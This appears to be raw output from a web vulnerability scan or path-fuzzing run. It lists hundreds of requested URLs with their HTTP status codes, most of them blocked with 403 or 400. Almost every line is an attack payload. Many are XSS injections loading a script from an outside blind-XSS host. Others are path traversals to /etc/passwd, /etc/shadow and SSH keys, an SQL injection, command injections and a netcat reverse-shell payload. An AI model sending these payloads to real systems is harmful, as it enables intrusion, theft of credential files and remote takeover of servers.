//pplay/info_prenotazioni.asp?immagine=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?selong="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//servlet/com.jsbsoft.jtf.core.SG?OBJET="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//?selat="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?view=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//index.php?Itemid="><script+src%3Dhttps%3A%2F%2Fvijay922.xss.ht><%2Fscript> (Status: 403) [Size: 4514]
//search.php?q=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search?keyword=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//property/search?uid=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?search=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?keywords=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//index.php?id=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//products?handler=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?p=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?lang=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?q=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?begindate=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?enddate=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//pro/events_ical.cfm?categoryids=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//pro/events_ical.cfm?categoryids2=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?month=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?eventSearch=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?cat=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search/?search=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//content.php?expand=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//servlet/com.jsbsoft.jtf.core.SG?CODE=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search/?s=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//index.php?action=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search/?q=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?page=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//videos?place=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//index.php?mebel_id=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?keywords=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//news/class/index.php?myord=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?email=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search?field%5B%5D=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//index.php?produkti_po_cena=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//index.php?produkti_po_ime=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?startTime=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//pro/events_print_setup.cfm?year=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//index.php?pn=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search?orgId=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//videos?tag=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//connexion?redirect_uri=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search.html?searchScope=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//login?redirect_uri=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//videos?search=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//plugins/actu/listing_actus-front.php?id_site=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//news/class/index.php?myshownums=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//apps/email/index.jsp?n=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search?s=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?squarefeet=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?featuredsearchseourl=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?garages=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?sort=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?listingagent=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//pro/minicalendar_print_setup.cfm?begindate=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?bathrooms=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search?search=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//pro/minicalendar_print_setup.cfm?enddate=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//pro/minicalendar_print_setup.cfm?keywords=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?yearbuilt=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//pro/minicalendar_print_setup.cfm?categoryid2=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?maxbuilt=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//index.php?Itemid=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?price=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?keywordsany=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?mls=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?t=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?featuredsearch=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?maxprice=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?minprice=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?selat=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//servlet/com.jsbsoft.jtf.core.SG?OBJET=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?siteid=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?geo=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?listingtypeid=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?selong=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?view=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?listingstatusid=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?minbuilt=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?subdivision=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//plan_du_site.php?lang=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search-results?q=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?lsid=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?name=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?listingtypes=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?nwlat=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?lotsizeval=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//firms/?text=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//?bedrooms=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//pro/minicalendar_detail.cfm?list_type=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
//search/?keyword=%22%3E%3Cscript%20src=https://vijay922.xss.ht%3E%3C/script%3E (Status: 403) [Size: 4514]
/[mini_cms_1.0.1_path]/index.php (Status: 400) [Size: 435]
/modx/assets/cache/docid_1/../../../../../../../etc/passwd\0.pagecache.php (Status: 400) [Size: 155]
/public/uploads/[uploaded (Status: 400) [Size: 435]
/[kamtiez]/news_detail.php (Status: 400) [Size: 435]
/errorcollector.php   (Status: 503) [Size: 0]
/script.js%3e%3c/script%3e&ext=somev (Status: 403) [Size: 4514]
/errorstruct.php      (Status: 503) [Size: 0]
/[wbnewspath]/admin/sendmsg.php (Status: 400) [Size: 435]
/[w-agora-directory]/delete_forum.php (Status: 400) [Size: 435]
/[guetbook-folder]/lang/codes-english.php (Status: 400) [Size: 435]
/hostapd_ssid=.*/hostapd_ssid=\\\ (Status: 400) [Size: 435]
/[mini_blog_1.0.1_path]/index.php (Status: 400) [Size: 435]
/[w-agora-directory]delete_forum.php (Status: 400) [Size: 435]
/errors/forbidden_error.php (Status: 503) [Size: 0]
/[upload_dir]/shell.php (Status: 400) [Size: 435]
/api/v1/fs/..%2f..%2fetc/passwd (Status: 403) [Size: 4514]
/action=choosedirectory&currentpath=c:\ (Status: 400) [Size: 435]
/[my_simple_forum_path]/index.php (Status: 400) [Size: 435]
/system.ini           (Status: 403) [Size: 4514]
/[guetbook-folder]/image.php (Status: 400) [Size: 435]
/[sinecms_path]/mods.php (Status: 400) [Size: 435]
/[m-core_path]/db/uyelik.mdb (Status: 400) [Size: 435]
/uploads/[uploaded    (Status: 400) [Size: 435]
/[pfa_path]/index.php (Status: 400) [Size: 435]
/[mailing_dir]/inc/initdb.php (Status: 400) [Size: 435]
/conferences/[conference-name]/author/show_paper_details.php (Status: 400) [Size: 435]
/[upload_dir]/        (Status: 400) [Size: 435]
/etc/services/inet/inet4_dhcpc_helper.php (Status: 403) [Size: 4514]
/[mybb-directory]/inc/datahandlers/event.php (Status: 400) [Size: 435]
/error404.data.php    (Status: 503) [Size: 0]
/[ememberspro_path]/users.mdb (Status: 400) [Size: 435]
/[w-agora-directory]/index.php (Status: 400) [Size: 435]
/home/grgfidcd/public_html/cctoronto/mod/[nst (Status: 400) [Size: 435]
/[wbnewspath]/admin/directory.php (Status: 400) [Size: 435]
/[synergiser_path]/index.php (Status: 400) [Size: 435]
/[saxon-directory]/admin/edit-item.php (Status: 400) [Size: 435]
/[simplogdir]/archive.php (Status: 400) [Size: 435]
/[ajlogin_path]/ajlogin.mdb (Status: 400) [Size: 435]
/[cauposhop]/index.php (Status: 400) [Size: 435]
/[simplogdir]/imagelist.php (Status: 400) [Size: 435]
/docebocms/[dc_path]admin/modules/block_media/util.media.php (Status: 400) [Size: 435]
/home/[user]/public_html/[service]/myclientbase/core/my_model.php (Status: 400) [Size: 435]
/rashtml5gateway//..\\\..\\\..\\\..\\\..\\\windows\win.ini (Status: 403) [Size: 4514]
/admin/[module        (Status: 400) [Size: 435]
/version.php          (Status: 503) [Size: 0]
/[vigile_cms_path]/index.php/nav=[downloadname]/cat=[xss] (Status: 400) [Size: 435]
/[kamtiez]/index.php  (Status: 400) [Size: 435]
/[guestbook-directory]/index.php (Status: 400) [Size: 435]
/[guestbook-directory]/picture.php (Status: 400) [Size: 435]
/phpmyvistes.php/aaa/b<script>alert(document.location)</script> (Status: 403) [Size: 4514]
/[postnuke_dir]/modules.php (Status: 400) [Size: 435]
/[upload_dir]/shell.php. (Status: 400) [Size: 435]
/my_keys&dst=../../../root/.ssh/authorized_keys (Status: 400) [Size: 155]
/data/uploads/[uploaded (Status: 400) [Size: 435]
/[php-counter]/list.php (Status: 400) [Size: 435]
/[webulas_path]/db/db.mdb (Status: 400) [Size: 435]
/[mybb-directory]/member.php (Status: 400) [Size: 435]
/activecalendar/data/[page].php (Status: 400) [Size: 435]
/[harikaonline_path]/harikaonline.mdb (Status: 400) [Size: 435]
/chkisg.htm%3fsip%3d1.1.1.1%20%7c%20cat%20%2fetc%2fpasswd (Status: 403) [Size: 4514]
/[jetbox-directory]/index.php (Status: 400) [Size: 435]
/[jetbox-directory]/open_tree.php (Status: 400) [Size: 435]
/votes/../../admin/multiuser/multiuser.php (Status: 400) [Size: 155]
/[webalbum_path]/photo_add-c.php (Status: 400) [Size: 435]
/[wbnewspath]/admin/themes.php (Status: 400) [Size: 435]
/[path]/index.php     (Status: 400) [Size: 435]
/[wbnewspath]/admin/comment.php (Status: 400) [Size: 435]
/[mybb-directory]/captcha.php (Status: 400) [Size: 435]
/signezui/playlist/edit/upload/../../../../../../../../../../etc/passwd (Status: 400) [Size: 155]
/forum/users/[username].php (Status: 400) [Size: 435]
/phamm/main.php/%22%3e%3cscript%3ealert%28123%29%3c/script%3e (Status: 403) [Size: 4514]
/[textpattern_g119_path]/textpattern/publish.php (Status: 400) [Size: 435]
/[vigile_cms_path]/index.php/nav=[wikiname] (Status: 400) [Size: 435]
/[awebnewspath]/visview.php (Status: 400) [Size: 435]
/[simplogdir]/preview.php (Status: 400) [Size: 435]
/[vigile_cms_path]/index.php (Status: 400) [Size: 435]
/[tilde_path]/index.php (Status: 400) [Size: 435]
/error.php            (Status: 503) [Size: 0]
/errors__/phperror_js.php (Status: 503) [Size: 0]
/version.txt          (Status: 503) [Size: 0]
/soapserver.php/1%3cscript%3eprompt(923395)%3c/script%3e (Status: 403) [Size: 4514]
/unattended/provision\ (Status: 400) [Size: 435]
/errorhandler.inc.php (Status: 503) [Size: 0]
/[simplogdir]/comments.php (Status: 400) [Size: 435]
/[sinecms_path]/admin/mods_adm.php (Status: 400) [Size: 435]
/[jetbox-directory]/admin/cms/opentree.php (Status: 400) [Size: 435]
/[jetbox-directory]/main_page.php (Status: 400) [Size: 435]
/[sphiderpath]/index.php (Status: 400) [Size: 435]
/system.ini&apos      (Status: 403) [Size: 4514]
/[jetbox-directory]/outputs.php (Status: 400) [Size: 435]
/includes/[value]/login.php (Status: 400) [Size: 435]
/[awebnewspath]/listing.php (Status: 400) [Size: 435]
/[site-with-vote].php (Status: 400) [Size: 435]
/index.php/%22%3c/a%3e%3cscript%3ealert(document.cookie)%3c/script%3e (Status: 403) [Size: 4514]
/[w-agora-directory]index.php (Status: 400) [Size: 435]
/[xtblogcms/index.php (Status: 400) [Size: 435]
/etc/services/inet/inet_ipv4.php (Status: 403) [Size: 4514]
/[jetbox-directory]/  (Status: 400) [Size: 435]
/flatnuke/forum/users/[username].php (Status: 400) [Size: 435]
/docebocms/[dc_path]admin/modules/news/news_class.php (Status: 400) [Size: 435]
/docebocms/[dc_path]admin/modules/content/content_class.php (Status: 400) [Size: 435]
//index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd (Status: 403) [Size: 4514]
//jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd (Status: 400) [Size: 155]
//./../../../../../../../../../../etc/shadow (Status: 400) [Size: 155]
//?mobile=1&mp_idx=%22;$.getScript(%27//127.0.0.1/z%27);// (Status: 403) [Size: 4514]
//?objGroupID=%31%32%27%7c%7c%28SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20%28seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT%28CONcat(0x203a20%2cUseR()%2cDAtaBASe()%2cVErsION())%2c(SeLEct%20%28ELT(112=112%2c1%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x%29a%29%29%7c%7c%27 (Status: 403) [Size: 4514]
//CONF&LOG=/etc/passwd&NOIH=no&FRAMES=y (Status: 403) [Size: 4514]
//EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR<svg%2fonload%3dprompt(8)>&searchType=contains&searchBy=ALL_FIELDS&actionId=Search (Status: 403) [Size: 4514]
//NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&b;tnLogIn=[Log&In]=&sLoginUserName= (Status: 400) [Size: 435]
//PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=g24aj%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Eqdaxl (Status: 403) [Size: 4514]
//SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=21111111ucgol"><img src%3da onerror%3dalert('XSS')>qzmm3u7id8z&selectName=Site (Status: 403) [Size: 4514]
//SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME= (Status: 403) [Size: 4514]
//SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f706z8rz68&selectName=Solutions (Status: 403) [Size: 4514]
//WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=../../../../../../../../etc/passwd (Status: 403) [Size: 4514]
//[/sideboxes/counter.php (Status: 400) [Size: 435]
//[/sideboxes/lastvisit.php (Status: 400) [Size: 435]
//[index.php          (Status: 400) [Size: 435]
//[iptbb/index.php    (Status: 400) [Size: 435]
//[/upload.php        (Status: 400) [Size: 435]
//[lizge/index.php    (Status: 400) [Size: 435]
//[phcdownload/search.php (Status: 400) [Size: 435]
//_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected (Status: 403) [Size: 4514]
//_images/[image_id].php (Status: 400) [Size: 435]
//a\..\..\muster.db   (Status: 400) [Size: 435]
//admin/overview?qcustompivot="><script>prompt(‘XSS’)</script> (Status: 403) [Size: 4514]
//admin/upload-ajax.php\ (Status: 400) [Size: 435]
//ajax.php?page=include/ajax/delete_item_general&delete_item=1&name=delete_user&id=[ID]) (Status: 400) [Size: 435]
//am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2 (Status: 403) [Size: 4514]
//aptana/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd (Status: 403) [Size: 4514]
//articlefr2/dashboard/videos/[String_Random].php (Status: 400) [Size: 435]
//authorphoto/user_name[id].php (Status: 400) [Size: 435]
//avatars/.php.php[   (Status: 400) [Size: 435]
//badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> (Status: 403) [Size: 4514]
//catalog.php?filename=../../../../../../../../../etc/passwd (Status: 403) [Size: 4514]
//categorysearch.php?cateid=<scRiPt>alert(1)</ScrIpT> (Status: 403) [Size: 4514]
//cgi-bin/betsie/parserl.pl/<script>alert( (Status: 403) [Size: 4514]
//cgi-bin/cgiServer.exx?command=dumpConfigFile(/etc/shadow) (Status: 403) [Size: 4514]
//cgi-bin/db4web_c/dbdirname/etc/hosts (Status: 403) [Size: 4514]
//cgi-bin/lsindex2.bat|dir%20c:\[dir] (Status: 400) [Size: 435]
//cgi-bin/operator/servetest?cmd=ntp&ServerName=pool.ntp.org&TimeZone=03:00|id||' (Status: 400) [Size: 435]
//cgi-bin/plusmail\   (Status: 400) [Size: 435]
//cgi-bin/post32.exe|echo%20>c:\text.txt (Status: 400) [Size: 435]
//cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-<script>alert("XSS")</script>) (Status: 403) [Size: 4514]
//cgi-bin/webviewer_login_page?lang=tu&loginvalue=0&port=0&data3=</script><script>alert(1)</script> (Status: 403) [Size: 4514]
//cgi/vqrespond.pl<SCRIPT>alert( (Status: 403) [Size: 4514]
//command.cgi?cat%20/etc/passwd (Status: 403) [Size: 4514]
//commentics/commentics/comments/[admin/index.php (Status: 400) [Size: 435]
//css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 155]
//dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ (Status: 400) [Size: 155]
//demo-servlets/%2fWEB-INF/config/mishka.properties (Status: 400) [Size: 435]
//doctor/doc_images/[FILE].php (Status: 400) [Size: 435]
//etc/passwd          (Status: 403) [Size: 4514]
//etc/shadow          (Status: 403) [Size: 4514]
//error               (Status: 503) [Size: 0]
//error.php           (Status: 503) [Size: 0]
//error.asp           (Status: 503) [Size: 0]
//error_box.html      (Status: 503) [Size: 0]
//error/500error.jsp  (Status: 503) [Size: 0]
//errors.php          (Status: 503) [Size: 0]
//error_message.php   (Status: 503) [Size: 0]
//errors/rights.asp   (Status: 503) [Size: 0]
//errors/transaction.asp (Status: 503) [Size: 0]
//error_view.php      (Status: 503) [Size: 0]
//exploits/1755'],    (Status: 400) [Size: 435]
//fetch.php/D=[base64_result] (Status: 400) [Size: 435]
//forum/users/[username].php (Status: 400) [Size: 435]
//ftplogin/[user]/ftp_index.php (Status: 400) [Size: 435]
//fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27 (Status: 400) [Size: 435]
//gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts (Status: 403) [Size: 4514]
//gitlab/build_now%3Csvg/onload=alert(document.domain)%3E (Status: 403) [Size: 4514]
//horde/[Horde_App]/login.php (Status: 400) [Size: 435]
//images/boot.ini     (Status: 403) [Size: 4514]
//index.php?m=admin&c=custom&a=themeexporthandle&theme_name=../../../etc/passwd (Status: 403) [Size: 4514]
//index.php?search_string=%27%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-19828%27)%3C%2Fscript%3E (Status: 403) [Size: 4514]
//index/[GED_File]_conf.php (Status: 400) [Size: 435]
//interface/registerclient/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font> (Status: 403) [Size: 4514]
//interface/registercustomer/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font> (Status: 403) [Size: 4514]
//interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result= (Status: 403) [Size: 4514]
//interface/registerreseller/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font> (Status: 403) [Size: 4514]
//js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 155]
//kmrs/exportmanager/ajax/getfiles?f=/../../../../../../../../../../proc/version (Status: 403) [Size: 4514]
//koha/opac-main.pl]  (Status: 400) [Size: 435]
//lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 155]
//lildbi/e/admin/files/[name].php (Status: 400) [Size: 435]
//linpha-1.3.4\actions\rotate.php (Status: 400) [Size: 435]
//login.php?referer=%22%3E%3Cscript%3Ealert('Cinta%20Infinita')%3C/script%3E (Status: 403) [Size: 4514]
//magento/index.php/api/soap/index\n (Status: 400) [Size: 435]
//manual/en/function.date.php\ (Status: 400) [Size: 435]
//mobile/error-not-supported-platform.html?desktop_url=javascript:alert(document.cookie);//itms:// (Status: 403) [Size: 4514]
//opencms/system/workplace/views/explorer/tree_fs.jsp?type=</script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite= (Status: 403) [Size: 4514]
//pages/[shell.php].  (Status: 400) [Size: 435]
//phpchat]            (Status: 400) [Size: 435]
//phpmyfaq/data/tracking[date] (Status: 400) [Size: 435]
//platinum/platformSettingEdit.cgi?type=>"><script>alert("XXS POC")</script> (Status: 403) [Size: 4514]
//pls/[DADName]/icx_define_pages.DispPageDialog (Status: 400) [Size: 435]
//pls/[DADName]/icx_define_pages.editpagelist (Status: 400) [Size: 435]
//pls/[DADName]/oracleconfigure.customize (Status: 400) [Size: 435]
//plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script> (Status: 403) [Size: 4514]
//profile_pics/[ID_FILE].php (Status: 400) [Size: 435]
//profile_pics/[FILE].php (Status: 400) [Size: 435]
//public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();' (Status: 400) [Size: 435]
//public/music_song/1000000/[numbers]/[user_id]/[some_numbers].php (Status: 400) [Size: 435]
//pwsphp\             (Status: 400) [Size: 435]
//qsr_server/device/getThumbnail?sourceUri='%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20"+lhost+"%20"+lport.to_s+"%20%3E%2Ftmp%2Ff;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150 (Status: 400) [Size: 435]
//res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 155]
//reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E (Status: 403) [Size: 4514]
//script/cars_images/[id]_logo_your_shell.php (Status: 400) [Size: 435]
//script/jobseekers/jobseeker_profile_images/[id]_offer_your_shel.php (Status: 400) [Size: 435]
//script/pictures/[id]your_shell.php (Status: 400) [Size: 435]
//script/re_images/[id]_logo_your_shell.php (Status: 400) [Size: 435]
//script/template\index.php (Status: 400) [Size: 435]
//scripts/wa.exe?OK=<svg/onload=%26%23097lert%26lpar;'MTK')> (Status: 403) [Size: 4514]
//server/admin/helper/updateUser.php\ (Status: 400) [Size: 435]
//servlets/gnujsp/[dirname]/[file] (Status: 400) [Size: 435]
//sugarcrm/include/SugarCharts/Jit/FlashCanvas/flashcanvas.swf?id=12345678\%22));}catch(e){alert(%27XSS%27)} (Status: 403) [Size: 4514]
//sugarcrm/include/javascript/yui/build/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);} (Status: 403) [Size: 4514]
//sugarcrm/include/javascript/yui3/build/io/io.swf?yid=\%22));}catch(e){alert('XSS');} (Status: 403) [Size: 4514]
//template\index.php  (Status: 400) [Size: 435]
